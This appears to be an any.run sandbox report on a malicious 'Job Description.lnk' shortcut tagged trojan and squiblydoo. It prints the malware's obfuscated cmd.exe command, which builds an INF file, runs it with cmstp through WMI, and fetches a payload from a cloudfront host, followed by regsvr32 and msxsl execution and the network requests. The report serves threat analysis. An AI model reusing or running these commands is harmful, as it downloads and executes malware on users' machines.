app.any.run
104.22.48.74  Public Scan

Submitted URL: https://t.co/iypca1f5kP
Effective URL: https://app.any.run/tasks/24327b69-4727-4093-8418-3cc8a8080df4/
Submission: On October 03 via api from IN — Scanned from CA

Form analysis: 0 forms found in the DOM

Text Content

Malicious activity
Win7, 32 bit, complete
Job Description.lnk
Video Twitter Mail Link
MD5: d04a0a43777452d0fc85c9c084b165a3
Start: 06.12.2020, 07:20
Total time: 300 s
Tags: trojan squiblydoo
Tracker: Trojan

CPU: 1,31,36,32,26,25,25,27,25,26,26,25,26,25,25,25,25,25,26,26,26,25,25,25,25,25,25,16,3,8,5,5,6,3,3,6,3,7,12,7,9,6,6,9,5,8,6,8,7,13
RAM: 15,16,16,17,17,17,17,17,17,17,17,17,17,17,17,17,16,16,16,16,16,16,16,16,16,16,16,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17,17
Processes
 * 2212
   cmd.exe
   /v /c set "WmGpudG46311=Items" && call set "WmGpudG0604=%WmGpudG46311:~4,1%"
   && (for %b in (c) do @set "WmGpudG51083=%~b") && !WmGpudG0604!et
   "WmGpudG9174=na" && !WmGpudG0604!et "WmGpudG1068=a" && !WmGpudG0604!et
   "WmGpudG04052=t" && !WmGpudG0604!et "WmGpudG27107=d" && call !WmGpudG0604!et
   "WmGpudG0630=%ran!WmGpudG27107!om%.inf" && call !WmGpudG0604!et
   "WmGpudG32542=%app!WmGpudG27107!ata%\Micro!WmGpudG0604!oft\!WmGpudG0630!" &&
   !WmGpudG0604!et "WmGpudG20252=." && !WmGpudG0604!et "WmGpudG0908="^" && (for
   %n in ("[ver!WmGpudG0604!ion]"
   "!WmGpudG0604!ig!WmGpudG9174!ture=$Window!WmGpudG0604! NT$"
   "[!WmGpudG27107!e!WmGpudG0604!tinationdirs]" "0CA4=01"
   "[!WmGpudG27107!efaultin!WmGpudG0604!tall_singleu!WmGpudG0604!er]"
   "UnRegis!WmGpudG04052!erOCXs=B653" "!WmGpudG27107!elfiles=0CA4" "[B653]"
   "%11%\%WmGpudG12096%crO%WmGpudG82899%j,NI,%WmGpudG7150%%WmGpudG8558%%WmGpudG8558%p%WmGpudG9304%%WmGpudG2088%%WmGpudG2088%ddy7itsuemb9i!WmGpudG20252!cloudfront!WmGpudG20252!%WmGpudG04144%/pwa!WmGpudG20252!bns"
   "[0CA4]" "!WmGpudG0630!" "[!WmGpudG0604!!WmGpudG04052!rings]" "WmGpudG8558=t"
   "WmGpudG7150=h" "WmGpudG9304=:" "WmGpudG12096=s" "WmGpudG2088=/"
   "WmGpudG82899=b" "WmGpudG04144=net" "!WmGpudG0604!ervicen!WmGpudG1068!me=' '"
   "!WmGpudG0604!hortsvcn!WmGpudG1068!me=' '") do @e!WmGpudG51083!ho
   %~n)>"!WmGpudG32542!"&& !WmGpudG0604!t!WmGpudG1068!rt "" /MIN
   wmi!WmGpudG51083! proce!WmGpudG0604!s call !WmGpudG51083!rea!WmGpudG04052!e
   "cm!WmGpudG0604!!WmGpudG04052!p /ns /!WmGpudG0604! /su !WmGpudG32542!"
   252
   6
   28
   
   * 3164
     WMIC.exe
     process call create "cmstp /ns /s /su
     C:\Users\admin\AppData\Roaming\Microsoft\14096.inf"
     230
     7
     104
     
 * 3628
   WMI
   cmstp.exe
   /ns /s /su C:\Users\admin\AppData\Roaming\Microsoft\14096.inf
   squiblydoo
   909
   63
   198
   
 * 776
   WMI
   WINWORD.EXE
   "C:\Users\admin\AppData\Roaming\Microsoft\30738.doc"
   5k
   1k
   156
   
 * 3508
   WMI
   regsvr32.exe
   /s /n /i "C:\Users\admin\AppData\Roaming\Microsoft\29635.ocx"
   262
   2
   104
   
   * 3048
     msxsl.exe
     PE
     4DB8A6666B9C310946.txt 4DB8A6666B9C310946.txt
     977
     90
     100
     
   * 3084
     cmd.exe
     /c del "C:\Users\admin\AppData\Roaming\Microsoft\29635.ocx" >> NUL
     61
     6
     24
     
 * 1152
   WMI
   typeperf.exe
   "\System\Processor Queue Length" -si 60 -sc 1
   5k
   2
   38
   
 * 2944
   WMI
   typeperf.exe
   "\System\Processor Queue Length" -si 60 -sc 1
   5k
   2
   38
   
 * 1736
   WMI
   typeperf.exe
   "\System\Processor Queue Length" -si 60 -sc 1
   5k
   2
   19
   

Network
HTTP Requests: 4
Connections: 7
DNS Requests: 5
Threats: 4

HTTP Requests

Timeshift | Request     | PID  | Process   | URL | Size    | Type
1567 ms   | GET 200: OK | 3628 | cmstp.exe | http://ddy7itsuemb9i.cloudfront.net/pwa.bns | 219 Kb  | xml
161.29 s  | GET 200: OK | 3048 | msxsl.exe | http://www.w3.org/1999/XSL/Format | 30 b    | text
161.30 s  | GET 200: OK | 3048 | msxsl.exe | http://s.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEGMYDTj7gJd4qdA1oxYY%2BEA%3D | 1.71 Kb | der
161.30 s  | GET 200: OK | 3048 | msxsl.exe | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAyO4MkNaokViAQGHuJB%2Ba8%3D | 471 b   | der
Warning: [1736] typeperf.exe executed via WMI